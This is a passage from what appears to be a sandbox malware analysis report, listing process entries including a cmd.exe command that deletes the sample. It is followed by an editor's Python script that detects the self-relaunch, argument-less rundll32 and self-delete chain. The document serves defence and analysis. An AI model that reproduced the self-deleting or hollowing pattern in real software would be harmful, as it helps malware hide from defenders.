                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0xd70000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:10:05:48
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
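
The process chain listed above (the sample starting a second copy of itself one second later, a SysWOW64 rundll32.exe launched with no arguments, then cmd.exe deleting the original file) is the pattern an endpoint detection would want to match. The following Python is an added example written by the editor and is not part of the Joe Sandbox report. Its event list is reconstructed from the process entries above using only the fields the report gives (start time, path, command line, WoW64 flag); the report does not list parent PIDs, so no parent/child relationship is assumed. The set of "argument-less suspects" and the 5-second relaunch window are the editor's own choices, not values taken from the report.

```python
"""
Detections for the FormBook-style process chain in the System Behavior
section: self-relaunch (hollowing candidate), an argument-less LOLBin,
and cmd.exe deleting the original sample.

Example code added by the editor; not part of the Joe Sandbox report.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
import ntpath
import re


@dataclass
class ProcEvent:
    start: datetime
    path: str       # image path as reported
    cmdline: str    # command line as reported (may be empty)
    wow64: bool     # 32-bit process on 64-bit Windows


def _ts(hms: str) -> datetime:
    # Every entry on the page comes from the same run on 12/04/2021.
    return datetime.strptime("2021-04-12 " + hms, "%Y-%m-%d %H:%M:%S")


# Constructed from the report's process entries (start time, path,
# command line, WoW64); parent PIDs are not on the page and are not used.
EVENTS = [
    ProcEvent(_ts("10:05:27"), r"C:\Users\user\Desktop\NdBLyH2h5d.exe",
              r"'C:\Users\user\Desktop\NdBLyH2h5d.exe'", True),
    ProcEvent(_ts("10:05:28"), r"C:\Users\user\Desktop\NdBLyH2h5d.exe",
              r"'C:\Users\user\Desktop\NdBLyH2h5d.exe'", True),
    ProcEvent(_ts("10:05:32"), r"C:\Windows\explorer.exe", "", False),
    ProcEvent(_ts("10:05:43"), r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\rundll32.exe", True),
    ProcEvent(_ts("10:05:48"), r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'", True),
    ProcEvent(_ts("10:05:48"), r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", False),
]

# Editor's choice (assumption): LOLBins that do nothing useful without
# arguments, so an argument-less launch is worth flagging.
ARGLESS_SUSPECTS = frozenset({"rundll32.exe", "regsvr32.exe"})


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _strip_quotes(s: str) -> str:
    return s.strip().strip("'\"")


def detect_self_relaunch(events, window=timedelta(seconds=5)):
    """Same image started twice within `window`: the classic shape of a
    loader that re-executes itself suspended and hollows the child."""
    hits, first_seen = [], {}
    for ev in sorted(events, key=lambda e: e.start):
        key = ev.path.lower()
        if key in first_seen and ev.start - first_seen[key] <= window:
            hits.append(("self_relaunch", ev.path, ev.start))
        first_seen.setdefault(key, ev.start)
    return hits


def detect_argless_lolbin(events, suspects=ARGLESS_SUSPECTS):
    """A suspect binary whose command line is empty or is nothing but its
    own image path was not started to do its normal job."""
    hits = []
    for ev in events:
        if _basename(ev.path) not in suspects:
            continue
        args = _strip_quotes(ev.cmdline)
        if args == "" or args.lower() == ev.path.lower():
            hits.append(("argless_lolbin", ev.path, ev.start))
    return hits


# Accepts "del path", "del 'path'" and 'del "path"'.
_DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<target>[^'"]+?)['"]?\s*$""",
                     re.IGNORECASE)


def detect_self_delete(events):
    """cmd.exe /c del <path> where <path> is the image of another process
    in the same session: the injected payload removing its dropper."""
    images = {ev.path.lower() for ev in events}
    hits = []
    for ev in events:
        if _basename(ev.path) != "cmd.exe":
            continue
        m = _DEL_RE.search(ev.cmdline)
        if m and m.group("target").lower() in images:
            hits.append(("self_delete", m.group("target"), ev.start))
    return hits


def run_detections(events):
    """Run all three detections; each hit is (rule, subject, start time)."""
    return (detect_self_relaunch(events)
            + detect_argless_lolbin(events)
            + detect_self_delete(events))


if __name__ == "__main__":
    for rule, subject, when in run_detections(EVENTS):
        print(f"{when.time()}  {rule:15s}  {subject}")
```

Run stand-alone it prints one line per rule. Each rule alone is weak (a broken shortcut can start rundll32.exe without arguments, installers do delete themselves); the value is in all three firing in the same session within about twenty seconds, and in ordering them by start time as the report does.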
